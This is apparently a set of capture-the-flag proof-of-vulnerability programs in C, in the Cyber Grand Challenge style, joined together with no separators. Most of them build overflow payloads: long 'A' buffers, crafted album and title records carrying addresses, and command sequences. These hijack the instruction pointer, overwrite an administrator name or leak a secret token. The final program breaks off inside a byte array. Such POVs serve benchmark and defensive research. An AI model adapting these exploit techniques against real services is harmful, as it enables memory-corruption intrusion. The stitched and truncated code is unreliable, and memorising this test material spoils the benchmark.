int main()
{
unsigned char exploit[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0c\"8N";
char admin_name[] = {12, 34, 56, 78 };
type2_vals t2;
type2_negotiate(&t2);
int secret = 0;
unsigned char buf[200];
unsigned short msg_length = 0;
unsigned short register_user_req = 11382;
char user_name[] = { 11, 22, 33, 44 };
//Register first user (this user will have name overwritten)
transmit_all(STDOUT, ®ister_user_req, sizeof(register_user_req));
msg_length = sizeof(user_name);
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, user_name, sizeof(user_name));
//Logout user
unsigned short logout_req = 8719;
transmit_all(STDOUT, &logout_req, sizeof(logout_req));
unsigned short login_req = 8711;
//Using the login (vulnerable) command overwrite user name of first user
transmit_all(STDOUT, &login_req, sizeof(login_req));
msg_length = sizeof(exploit) - 1;
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, exploit, sizeof(exploit) - 1);
msg_length = sizeof(admin_name);
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, admin_name, sizeof(admin_name));
//Now login as the administrator
transmit_all(STDOUT, &login_req, sizeof(login_req));
msg_length = sizeof(admin_name);
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, admin_name, sizeof(admin_name));
msg_length = sizeof(admin_name);
transmit_all(STDOUT, &msg_length, sizeof(msg_length));
transmit_all(STDOUT, admin_name, sizeof(admin_name));
unsigned short remote_token_req = 7777;
unsigned short page_idx = 100;
transmit_all(STDOUT, &remote_token_req, sizeof(remote_token_req));
transmit_all(STDOUT, &page_idx, sizeof(page_idx));
unsigned short exit_server = 9999;
transmit_all(STDOUT, &exit_server, sizeof(exit_server));
length_read(STDIN, buf, 24);
length_read(STDIN, (unsigned char *)(&secret), sizeof(secret));
type2_submit((unsigned char *)(&secret), sizeof(secret));
return 0;
}
int main(void)
{
unsigned int i;
unsigned char payload[4096], output[4096];
int arg1, arg2;
size_t pay_len = 0;
type1_vals t1;
type1_negotiate(0xfefefefe, 0xfefefefe, 5, &t1);
/* Read offset */
length_read(STDIN, output, 2);
short rslr = *(short *)output;
/* Write n */
i = 42;
transmit_all(STDOUT, &i, sizeof(unsigned int));
/* Fill */
memset(payload, 0, sizeof(payload));
for (i = 0; i < 38; ++i)
{
random(&arg1, sizeof(int), NULL);
*(unsigned int *)&payload[pay_len] = CMD_SUB; pay_len += sizeof(unsigned int);
*(int *)&payload[pay_len] = arg1 - rslr; pay_len += sizeof(int);
*(int *)&payload[pay_len] = arg1; pay_len += sizeof(int);
}
for (i = 0; i < 3; ++i)
{
arg1 = t1.regval & 0xFFFF0000;
arg2 = t1.regval & 0x0000FFFF;
*(unsigned int *)&payload[pay_len] = CMD_ADD; pay_len += sizeof(unsigned int);
*(int *)&payload[pay_len] = arg1 - rslr; pay_len += sizeof(int);
*(int *)&payload[pay_len] = arg2; pay_len += sizeof(int);
}
arg1 = t1.ipval & 0xFFFF0000;
arg2 = t1.ipval & 0x0000FFFF;
*(unsigned int *)&payload[pay_len] = CMD_ADD; pay_len += sizeof(unsigned int);
*(int *)&payload[pay_len] = arg1 - rslr; pay_len += sizeof(int);
*(int *)&payload[pay_len] = arg2; pay_len += sizeof(int);
*(unsigned int *)&payload[pay_len] = CMD_EXP; pay_len += sizeof(unsigned int);
*(unsigned int *)&payload[pay_len] = CMD_QUT; pay_len += sizeof(unsigned int);
transmit_all(STDOUT, payload, pay_len);
length_read(STDIN, output, 1);
return 0;
}
int main()
{
type2_vals t2;
unsigned char buf[200];
int i;
size_t bytes;
cgc_memcpy(buf, "\x00\xff""HDR\x05\x00\x00\x00\x01\x00"
"ALBM\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x20\xc0\x47\x43""CCCCAAAAAAAAAAAA"
"TITL\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x30\xc0\x47\x43""CCCCAAAAAAAAAAAA\x7f", 140);
random(buf + 11 + 8 + 24, 12, &bytes);
random(buf + 11 + 8 + 24 + 16, 16, &bytes);
random(buf + 11 + 0x40 + 8 + 24, 12, &bytes);
random(buf + 11 + 0x40 + 8 + 24 + 16, 16, &bytes);
for (i = 0; i < 139; i++)
{
// make sure we didn't introduce any bad chars
if (i >= 11 + 0x20 && i < 11 + 0x40 && buf[i] < 0x10) buf[i] ^= 0x55;
if (i >= 11 + 0x60 && i < 11 + 0x80 && buf[i] < 0x10) buf[i] ^= 0x55;
if (buf[i] == 0x7f) buf[i] = 0x3f;
if (buf[i] == 0x7e) buf[i] = 0x3e;
}
type2_negotiate(&t2);
transmit_all(STDOUT, buf, 140);
length_read(STDIN, buf, 0x58);
length_read(STDIN, buf, 16);
// buf contains: "Album: ?????????"
// as long as buf does not contain "Arti", we have won
for (i = 7; i < 16; i++)
if (memcmp(&buf[i], "Arti", 4) == 0)
break;
if (i == 16)
{
type2_submit(buf + 7, 4);
return 0;
}
// we found "Arti", so look some more
length_read(STDIN, buf, 8);
type2_submit(buf + 4, 4);
return 0;
}
int play_ttt(int turn)
{
unsigned char len_resp[128];
//unsigned int resp_len = 0;
//unsigned char *resp = NULL;
char *select_guess_num_game = "3\n";
cgc_memset(len_resp, 0, 128);
read_until_game_prompt();
length_read(STDIN, len_resp, cgc_strlen("Game # "));
transmit_all(STDOUT, select_guess_num_game, cgc_strlen(select_guess_num_game));
if (turn == COMPUTER) {
switch(find_corner()) {
case 0:
transmit_all(STDOUT, "1,1\n", 4);
transmit_all(STDOUT, "0,2\n", 4);
transmit_all(STDOUT, "1,0\n", 4);
transmit_all(STDOUT, "2,2\n", 4);
return 0;
case 1:
transmit_all(STDOUT, "1,1\n", 4);
transmit_all(STDOUT, "0,1\n", 4);
transmit_all(STDOUT, "1,0\n", 4);
transmit_all(STDOUT, "2,2\n", 4);
return 1;
case 2:
transmit_all(STDOUT, "1,1\n", 4);
transmit_all(STDOUT, "1,0\n", 4);
transmit_all(STDOUT, "2,2\n", 4);
transmit_all(STDOUT, "0,2\n", 4);
return 2;
case 3:
transmit_all(STDOUT, "1,1\n", 4);
transmit_all(STDOUT, "2,1\n", 4);
transmit_all(STDOUT, "0,2\n", 4);
transmit_all(STDOUT, "1,0\n", 4);
return 3;
}
} else {
transmit_all(STDOUT, "2,0\n", 4);
transmit_all(STDOUT, "2,1\n", 4);
transmit_all(STDOUT, "0,0\n", 4);
transmit_all(STDOUT, "1,2\n", 4);
transmit_all(STDOUT, "0,2\n", 4);
return 5;
}
return -1;
}
int play_rps()
{
unsigned char len_resp[128];
unsigned int resp_len = 0;
unsigned char *resp = NULL;
char *select_guess_num_game = "1\n";
char *hammer = "HAMMER\n";
cgc_memset(len_resp, 0, 128);
read_until_game_prompt();
length_read(STDIN, len_resp, cgc_strlen("Game # "));
transmit_all(STDOUT, select_guess_num_game, cgc_strlen(select_guess_num_game));
cgc_memset(len_resp, 0, 128);
length_read(STDIN, len_resp, cgc_strlen("Choose [HAMMER, SHEET, SHEERS]: "));
transmit_all(STDOUT, hammer, cgc_strlen(hammer));
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
if(memcmp(resp, "You Win!", 8) == 0) {
return 0;
}
return 1;
}
int main(void) {
type1_vals t1vals = { 0 };
uint32_t mask_eip, mask_reg;
mask_eip = 0x0FFFFF00;
mask_reg = 0x0FFFFF00;
type1_negotiate(mask_eip, mask_reg, 2, &t1vals);
t1vals.ipval |= 0xF0000000; // make sure out of range of valid fn ptrs
t1vals.regval |= 0xF0000000; // make sure out of range of valid fn ptrs
do {
//*** writing data
static unsigned char write_00000_00000[] =
"\xd0\xd1\xd2\xd3\x04\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x88\x13\x00\x00\x01\x00\x00\x00\x7c\x24\x00\x00"
"\x02\x00\x00\x00\x03\x26\x00\x00\x03\x00\x00\x00\x5c\x1d\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0f\x00\x00\x00"
"\x04\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00"
"\x0f\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00"
"\x02\x00\x00\x00\x0f\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00"
"\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00"
"\x0f\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00"
"\x05\x00\x00\x00\x0f\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x04\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00"
"\x01\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00"
"\x05\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00"
"\x0f\x00\x00\x00";
static unsigned int write_00000_00000_len = 228;
unsigned char *write_00000 = NULL;
unsigned int write_00000_len = 0;
write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len);
if (write_00000_len > 0) {
transmit_all(1, write_00000, write_00000_len);
}
free(write_00000);
} while (0);
do {
unsigned char *read_00000;
unsigned int read_00000_len;
unsigned int read_00000_ptr = 0;
//**** length cgc_read
read_00000_len = 4;
read_00000 = (unsigned char*)malloc(read_00000_len);
int read_00000_res = length_read(0, read_00000, read_00000_len);
if (read_00000_res) {} //silence unused variable warning
free(read_00000);
if (read_00000_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00001_00000[] =
"\x40\x41\x42\x43\xc8\x00\x00\x00\x41\x41\x41\x41\x01\x00\x00\x00"
"\x1c\x00\x00\x00\x1f\x1f\x1f\x1f\x42\x41\x41\x41\x00\x00\x00\x00"
"\x26\x00\x00\x00\x20\x1f\x1f\x1f\x43\x41\x41\x41\x00\x00\x00\x00"
"\x1f\x00\x00\x00\x21\x1f\x1f\x1f\x44\x41\x41\x41\x00\x00\x00\x00"
"\x2f\x00\x00\x00\x22\x1f\x1f\x1f\x45\x41\x41\x41\x01\x00\x00\x00"
"\x0f\x00\x00\x00\x23\x1f\x1f\x1f\x46\x41\x41\x41\x00\x00\x00\x00"
"\x25\x00\x00\x00\x24\x1f\x1f\x1f\x47\x41\x41\x41\x00\x00\x00\x00"
"\x20\x00\x00\x00\x25\x1f\x1f\x1f\x48\x41\x41\x41\x00\x00\x00\x00"
"\x11\x00\x00\x00\x26\x1f\x1f\x1f\x49\x41\x41\x41\x00\x00\x00\x00"
"\x0d\x00\x00\x00\x27\x1f\x1f\x1f\x4a\x41\x41\x41\x01\x00\x00\x00"
"\x12\x00\x00\x00\x28\x1f\x1f\x1f\x4b\x41\x41\x41\x00\x00\x00\x00"
"\x0e\x00\x00\x00\x29\x1f\x1f\x1f\x4c\x41\x41\x41\x01\x00\x00\x00"
"\x15\x00\x00\x00\x2a\x1f\x1f\x1f\x4d\x41\x41\x41\x01\x00\x00\x00"
"\x20\x00\x00\x00\x2b\x1f\x1f\x1f\x4e\x41\x41\x41\x00\x00\x00\x00"
"\x09\x00\x00\x00\x2c\x1f\x1f\x1f\x4f\x41\x41\x41\x00\x00\x00\x00"
"\x07\x00\x00\x00\x2d\x1f\x1f\x1f\x50\x41\x41\x41\x00\x00\x00\x00"
"\x2e\x00\x00\x00\x2e\x1f\x1f\x1f\x51\x41\x41\x41\x00\x00\x00\x00"
"\x17\x00\x00\x00\x2f\x1f\x1f\x1f\x52\x41\x41\x41\x00\x00\x00\x00"
"\x05\x00\x00\x00\x30\x1f\x1f\x1f\x53\x41\x41\x41\x00\x00\x00\x00"
"\x22\x00\x00\x00\x31\x1f\x1f\x1f\x54\x41\x41\x41\x01\x00\x00\x00"
"\x15\x00\x00\x00\x32\x1f\x1f\x1f\x55\x41\x41\x41\x01\x00\x00\x00"
"\x25\x00\x00\x00\x33\x1f\x1f\x1f\x56\x41\x41\x41\x01\x00\x00\x00"
"\x0d\x00\x00\x00\x34\x1f\x1f\x1f\x57\x41\x41\x41\x01\x00\x00\x00"
"\x10\x00\x00\x00\x35\x1f\x1f\x1f\x58\x41\x41\x41\x01\x00\x00\x00"
"\x2b\x00\x00\x00\x36\x1f\x1f\x1f\x59\x41\x41\x41\x01\x00\x00\x00"
"\x32\x00\x00\x00\x37\x1f\x1f\x1f\x5a\x41\x41\x41\x01\x00\x00\x00"
"\x14\x00\x00\x00\x38\x1f\x1f\x1f\x5b\x41\x41\x41\x01\x00\x00\x00"
"\x29\x00\x00\x00\x39\x1f\x1f\x1f\x5c\x41\x41\x41\x00\x00\x00\x00"
"\x19\x00\x00\x00\x3a\x1f\x1f\x1f\x5d\x41\x41\x41\x01\x00\x00\x00"
"\x0c\x00\x00\x00\x3b\x1f\x1f\x1f\x5e\x41\x41\x41\x01\x00\x00\x00"
"\x11\x00\x00\x00\x3c\x1f\x1f\x1f\x5f\x41\x41\x41\x00\x00\x00\x00"
"\x25\x00\x00\x00\x3d\x1f\x1f\x1f\x60\x41\x41\x41\x00\x00\x00\x00"
"\x12\x00\x00\x00\x3e\x1f\x1f\x1f\x61\x41\x41\x41\x01\x00\x00\x00"
"\x11\x00\x00\x00\x3f\x1f\x1f\x1f\x62\x41\x41\x41\x00\x00\x00\x00"
"\x14\x00\x00\x00\x40\x1f\x1f\x1f\x63\x41\x41\x41\x01\x00\x00\x00"
"\x2b\x00\x00\x00\x41\x1f\x1f\x1f\x64\x41\x41\x41\x01\x00\x00\x00"
"\x2b\x00\x00\x00\x42\x1f\x1f\x1f\x65\x41\x41\x41\x01\x00\x00\x00"
"\x20\x00\x00\x00\x43\x1f\x1f\x1f\x66\x41\x41\x41\x00\x00\x00\x00"
"\x06\x00\x00\x00\x44\x1f\x1f\x1f\x67\x41\x41\x41\x01\x00\x00\x00"
"\x2d\x00\x00\x00\x45\x1f\x1f\x1f\x68\x41\x41\x41\x01\x00\x00\x00"
"\x1a\x00\x00\x00\x46\x1f\x1f\x1f\x69\x41\x41\x41\x01\x00\x00\x00"
"\x0e\x00\x00\x00\x47\x1f\x1f\x1f\x6a\x41\x41\x41\x01\x00\x00\x00"
"\x1c\x00\x00\x00\x48\x1f\x1f\x1f\x6b\x41\x41\x41\x01\x00\x00\x00"
"\x28\x00\x00\x00\x49\x1f\x1f\x1f\x6c\x41\x41\x41\x01\x00\x00\x00"
"\x07\x00\x00\x00\x4a\x1f\x1f\x1f\x6d\x41\x41\x41\x00\x00\x00\x00"
"\x08\x00\x00\x00\x4b\x1f\x1f\x1f\x6e\x41\x41\x41\x01\x00\x00\x00"
"\x2d\x00\x00\x00\x4c\x1f\x1f\x1f\x6f\x41\x41\x41\x00\x00\x00\x00"
"\x21\x00\x00\x00\x4d\x1f\x1f\x1f\x70\x41\x41\x41\x00\x00\x00\x00"
"\x1c\x00\x00\x00\x4e\x1f\x1f\x1f\x71\x41\x41\x41\x01\x00\x00\x00"
"\x08\x00\x00\x00\x4f\x1f\x1f\x1f\x72\x41\x41\x41\x00\x00\x00\x00"
"\x13\x00\x00\x00\x50\x1f\x1f\x1f\x73\x41\x41\x41\x00\x00\x00\x00"
"\x0f\x00\x00\x00\x51\x1f\x1f\x1f\x74\x41\x41\x41\x00\x00\x00\x00"
"\x0c\x00\x00\x00\x52\x1f\x1f\x1f\x75\x41\x41\x41\x01\x00\x00\x00"
"\x25\x00\x00\x00\x53\x1f\x1f\x1f\x76\x41\x41\x41\x00\x00\x00\x00"
"\x1e\x00\x00\x00\x54\x1f\x1f\x1f\x77\x41\x41\x41\x01\x00\x00\x00"
"\x2c\x00\x00\x00\x55\x1f\x1f\x1f\x78\x41\x41\x41\x00\x00\x00\x00"
"\x20\x00\x00\x00\x56\x1f\x1f\x1f\x79\x41\x41\x41\x00\x00\x00\x00"
"\x21\x00\x00\x00\x57\x1f\x1f\x1f\x7a\x41\x41\x41\x01\x00\x00\x00"
"\x23\x00\x00\x00\x58\x1f\x1f\x1f\x7b\x41\x41\x41\x00\x00\x00\x00"
"\x20\x00\x00\x00\x59\x1f\x1f\x1f\x7c\x41\x41\x41\x01\x00\x00\x00"
"\x21\x00\x00\x00\x5a\x1f\x1f\x1f\x7d\x41\x41\x41\x01\x00\x00\x00"
"\x32\x00\x00\x00\x5b\x1f\x1f\x1f\x7e\x41\x41\x41\x01\x00\x00\x00"
"\x25\x00\x00\x00\x5c\x1f\x1f\x1f\x7f\x41\x41\x41\x01\x00\x00\x00"
"\x13\x00\x00\x00\x5d\x1f\x1f\x1f\x80\x41\x41\x41\x01\x00\x00\x00"
"\x17\x00\x00\x00\x5e\x1f\x1f\x1f\x81\x41\x41\x41\x01\x00\x00\x00"
"\x31\x00\x00\x00\x5f\x1f\x1f\x1f\x82\x41\x41\x41\x01\x00\x00\x00"
"\x23\x00\x00\x00\x60\x1f\x1f\x1f\x83\x41\x41\x41\x00\x00\x00\x00"
"\x1b\x00\x00\x00\x61\x1f\x1f\x1f\x84\x41\x41\x41\x00\x00\x00\x00"
"\x11\x00\x00\x00\x62\x1f\x1f\x1f\x85\x41\x41\x41\x01\x00\x00\x00"
"\x25\x00\x00\x00\x63\x1f\x1f\x1f\x86\x41\x41\x41\x01\x00\x00\x00"
"\x10\x00\x00\x00\x64\x1f\x1f\x1f\x87\x41\x41\x41\x01\x00\x00\x00"
"\x0f\x00\x00\x00\x65\x1f\x1f\x1f\x88\x41\x41\x41\x00\x00\x00\x00"
"\x09\x00\x00\x00\x66\x1f\x1f\x1f\x89\x41\x41\x41\x01\x00\x00\x00"
"\x0f\x00\x00\x00\x67\x1f\x1f\x1f\x8a\x41\x41\x41\x00\x00\x00\x00"
"\x23\x00\x00\x00\x68\x1f\x1f\x1f\x8b\x41\x41\x41\x01\x00\x00\x00"
"\x19\x00\x00\x00\x69\x1f\x1f\x1f\x8c\x41\x41\x41\x01\x00\x00\x00"
"\x0c\x00\x00\x00\x6a\x1f\x1f\x1f\x8d\x41\x41\x41\x01\x00\x00\x00"
"\x1f\x00\x00\x00\x6b\x1f\x1f\x1f\x8e\x41\x41\x41\x00\x00\x00\x00"
"\x1c\x00\x00\x00\x6c\x1f\x1f\x1f\x8f\x41\x41\x41\x01\x00\x00\x00"
"\x2d\x00\x00\x00\x6d\x1f\x1f\x1f\x90\x41\x41\x41\x01\x00\x00\x00"
"\x0a\x00\x00\x00\x6e\x1f\x1f\x1f\x91\x41\x41\x41\x00\x00\x00\x00"
"\x05\x00\x00\x00\x6f\x1f\x1f\x1f\x92\x41\x41\x41\x01\x00\x00\x00"
"\x08\x00\x00\x00\x70\x1f\x1f\x1f\x93\x41\x41\x41\x01\x00\x00\x00"
"\x31\x00\x00\x00\x71\x1f\x1f\x1f\x94\x41\x41\x41\x00\x00\x00\x00"
"\x12\x00\x00\x00\x72\x1f\x1f\x1f\x95\x41\x41\x41\x00\x00\x00\x00"
"\x13\x00\x00\x00\x73\x1f\x1f\x1f\x96\x41\x41\x41\x00\x00\x00\x00"
"\x16\x00\x00\x00\x74\x1f\x1f\x1f\x97\x41\x41\x41\x00\x00\x00\x00"
"\x22\x00\x00\x00\x75\x1f\x1f\x1f\x98\x41\x41\x41\x00\x00\x00\x00"
"\x20\x00\x00\x00\x76\x1f\x1f\x1f\x99\x41\x41\x41\x01\x00\x00\x00"
"\x21\x00\x00\x00\x77\x1f\x1f\x1f\x9a\x41\x41\x41\x01\x00\x00\x00"
"\x20\x00\x00\x00\x78\x1f\x1f\x1f\x9b\x41\x41\x41\x00\x00\x00\x00"
"\x20\x00\x00\x00\x79\x1f\x1f\x1f\x9c\x41\x41\x41\x01\x00\x00\x00"
"\x1b\x00\x00\x00\x7a\x1f\x1f\x1f\x9d\x41\x41\x41\x00\x00\x00\x00"
"\x1b\x00\x00\x00\x7b\x1f\x1f\x1f\x9e\x41\x41\x41\x00\x00\x00\x00"
"\x2f\x00\x00\x00\x7c\x1f\x1f\x1f\x9f\x41\x41\x41\x00\x00\x00\x00"
"\x08\x00\x00\x00\x7d\x1f\x1f\x1f\xa0\x41\x41\x41\x01\x00\x00\x00"
"\x24\x00\x00\x00\x7e\x1f\x1f\x1f\xa1\x41\x41\x41\x00\x00\x00\x00"
"\x13\x00\x00\x00\x7f\x1f\x1f\x1f\xa2\x41\x41\x41\x01\x00\x00\x00"
"\x19\x00\x00\x00\x80\x1f\x1f\x1f\xa3\x41\x41\x41\x01\x00\x00\x00"
"\x1d\x00\x00\x00\x81\x1f\x1f\x1f\xa4\x41\x41\x41\x01\x00\x00\x00"
"\x13\x00\x00\x00\x82\x1f\x1f\x1f\xa5\x41\x41\x41\x00\x00\x00\x00"
"\x0d\x00\x00\x00\x83\x1f\x1f\x1f\xa6\x41\x41\x41\x01\x00\x00\x00"
"\x21\x00\x00\x00\x84\x1f\x1f\x1f\xa7\x41\x41\x41\x01\x00\x00\x00"
"\x2f\x00\x00\x00\x85\x1f\x1f\x1f\xa8\x41\x41\x41\x00\x00\x00\x00"
"\x06\x00\x00\x00\x86\x1f\x1f\x1f\xa9\x41\x41\x41\x01\x00\x00\x00"
"\x2e\x00\x00\x00\x87\x1f\x1f\x1f\xaa\x41\x41\x41\x01\x00\x00\x00"
"\x0b\x00\x00\x00\x88\x1f\x1f\x1f\xab\x41\x41\x41\x01\x00\x00\x00"
"\x32\x00\x00\x00\x89\x1f\x1f\x1f\xac\x41\x41\x41\x01\x00\x00\x00"
"\x09\x00\x00\x00\x8a\x1f\x1f\x1f\xad\x41\x41\x41\x01\x00\x00\x00"
"\x2a\x00\x00\x00\x8b\x1f\x1f\x1f\xae\x41\x41\x41\x01\x00\x00\x00"
"\x0d\x00\x00\x00\x8c\x1f\x1f\x1f\xaf\x41\x41\x41\x00\x00\x00\x00"
"\x16\x00\x00\x00\x8d\x1f\x1f\x1f\xb0\x41\x41\x41\x00\x00\x00\x00"
"\x08\x00\x00\x00\x8e\x1f\x1f\x1f\xb1\x41\x41\x41\x01\x00\x00\x00"
"\x08\x00\x00\x00\x8f\x1f\x1f\x1f\xb2\x41\x41\x41\x01\x00\x00\x00"
"\x1d\x00\x00\x00\x90\x1f\x1f\x1f\xb3\x41\x41\x41\x01\x00\x00\x00"
"\x12\x00\x00\x00\x91\x1f\x1f\x1f\xb4\x41\x41\x41\x00\x00\x00\x00"
"\x2f\x00\x00\x00\x92\x1f\x1f\x1f\xb5\x41\x41\x41\x00\x00\x00\x00"
"\x0b\x00\x00\x00\x93\x1f\x1f\x1f\xb6\x41\x41\x41\x00\x00\x00\x00"
"\x29\x00\x00\x00\x94\x1f\x1f\x1f\xb7\x41\x41\x41\x01\x00\x00\x00"
"\x0a\x00\x00\x00\x95\x1f\x1f\x1f\xb8\x41\x41\x41\x00\x00\x00\x00"
"\x13\x00\x00\x00\x96\x1f\x1f\x1f\xb9\x41\x41\x41\x00\x00\x00\x00"
"\x21\x00\x00\x00\x97\x1f\x1f\x1f\xba\x41\x41\x41\x01\x00\x00\x00"
"\x1f\x00\x00\x00\x98\x1f\x1f\x1f\xbb\x41\x41\x41\x00\x00\x00\x00"
"\x23\x00\x00\x00\x99\x1f\x1f\x1f\xbc\x41\x41\x41\x00\x00\x00\x00"
"\x1c\x00\x00\x00\x9a\x1f\x1f\x1f\xbd\x41\x41\x41\x00\x00\x00\x00"
"\x09\x00\x00\x00\x9b\x1f\x1f\x1f\xbe\x41\x41\x41\x00\x00\x00\x00"
"\x1a\x00\x00\x00\x9c\x1f\x1f\x1f\xbf\x41\x41\x41\x00\x00\x00\x00"
"\x10\x00\x00\x00\x9d\x1f\x1f\x1f\xc0\x41\x41\x41\x00\x00\x00\x00"
"\x20\x00\x00\x00\x9e\x1f\x1f\x1f\xc1\x41\x41\x41\x00\x00\x00\x00"
"\x1d\x00\x00\x00\x9f\x1f\x1f\x1f\xc2\x41\x41\x41\x00\x00\x00\x00"
"\x2c\x00\x00\x00\xa0\x1f\x1f\x1f\xc3\x41\x41\x41\x01\x00\x00\x00"
"\x13\x00\x00\x00\xa1\x1f\x1f\x1f\xc4\x41\x41\x41\x00\x00\x00\x00"
"\x2e\x00\x00\x00\xa2\x1f\x1f\x1f\xc5\x41\x41\x41\x01\x00\x00\x00"
"\x1c\x00\x00\x00\xa3\x1f\x1f\x1f\xc6\x41\x41\x41\x01\x00\x00\x00"
"\x0f\x00\x00\x00\xa4\x1f\x1f\x1f\xc7\x41\x41\x41\x01\x00\x00\x00"
"\x16\x00\x00\x00\xa5\x1f\x1f\x1f\xc8\x41\x41\x41\x00\x00\x00\x00"
"\x0c\x00\x00\x00\xa6\x1f\x1f\x1f\xc9\x41\x41\x41\x01\x00\x00\x00"
"\x0f\x00\x00\x00\xa7\x1f\x1f\x1f\xca\x41\x41\x41\x01\x00\x00\x00"
"\x13\x00\x00\x00\xa8\x1f\x1f\x1f\xcb\x41\x41\x41\x01\x00\x00\x00"
"\x32\x00\x00\x00\xa9\x1f\x1f\x1f\xcc\x41\x41\x41\x01\x00\x00\x00"
"\x06\x00\x00\x00\xaa\x1f\x1f\x1f\xcd\x41\x41\x41\x01\x00\x00\x00"
"\x18\x00\x00\x00\xab\x1f\x1f\x1f\xce\x41\x41\x41\x00\x00\x00\x00"
"\x17\x00\x00\x00\xac\x1f\x1f\x1f\xcf\x41\x41\x41\x01\x00\x00\x00"
"\x29\x00\x00\x00\xad\x1f\x1f\x1f\xd0\x41\x41\x41\x00\x00\x00\x00"
"\x0c\x00\x00\x00\xae\x1f\x1f\x1f\xd1\x41\x41\x41\x01\x00\x00\x00"
"\x2b\x00\x00\x00\xaf\x1f\x1f\x1f\xd2\x41\x41\x41\x01\x00\x00\x00"
"\x09\x00\x00\x00\xb0\x1f\x1f\x1f\xd3\x41\x41\x41\x01\x00\x00\x00"
"\x0b\x00\x00\x00\xb1\x1f\x1f\x1f\xd4\x41\x41\x41\x00\x00\x00\x00"
"\x0f\x00\x00\x00\xb2\x1f\x1f\x1f\xd5\x41\x41\x41\x01\x00\x00\x00"
"\x17\x00\x00\x00\xb3\x1f\x1f\x1f\xd6\x41\x41\x41\x01\x00\x00\x00"
"\x16\x00\x00\x00\xb4\x1f\x1f\x1f\xd7\x41\x41\x41\x00\x00\x00\x00"
"\x0a\x00\x00\x00\xb5\x1f\x1f\x1f\xd8\x41\x41\x41\x01\x00\x00\x00"
"\x23\x00\x00\x00\xb6\x1f\x1f\x1f\xd9\x41\x41\x41\x01\x00\x00\x00"
"\x0a\x00\x00\x00\xb7\x1f\x1f\x1f\xda\x41\x41\x41\x01\x00\x00\x00"
"\x2c\x00\x00\x00\xb8\x1f\x1f\x1f\xdb\x41\x41\x41\x00\x00\x00\x00"
"\x24\x00\x00\x00\xb9\x1f\x1f\x1f\xdc\x41\x41\x41\x00\x00\x00\x00"
"\x0f\x00\x00\x00\xba\x1f\x1f\x1f\xdd\x41\x41\x41\x00\x00\x00\x00"
"\x2a\x00\x00\x00\xbb\x1f\x1f\x1f\xde\x41\x41\x41\x01\x00\x00\x00"
"\x1f\x00\x00\x00\xbc\x1f\x1f\x1f\xdf\x41\x41\x41\x00\x00\x00\x00"
"\x22\x00\x00\x00\xbd\x1f\x1f\x1f\xe0\x41\x41\x41\x00\x00\x00\x00"
"\x27\x00\x00\x00\xbe\x1f\x1f\x1f\xe1\x41\x41\x41\x01\x00\x00\x00"
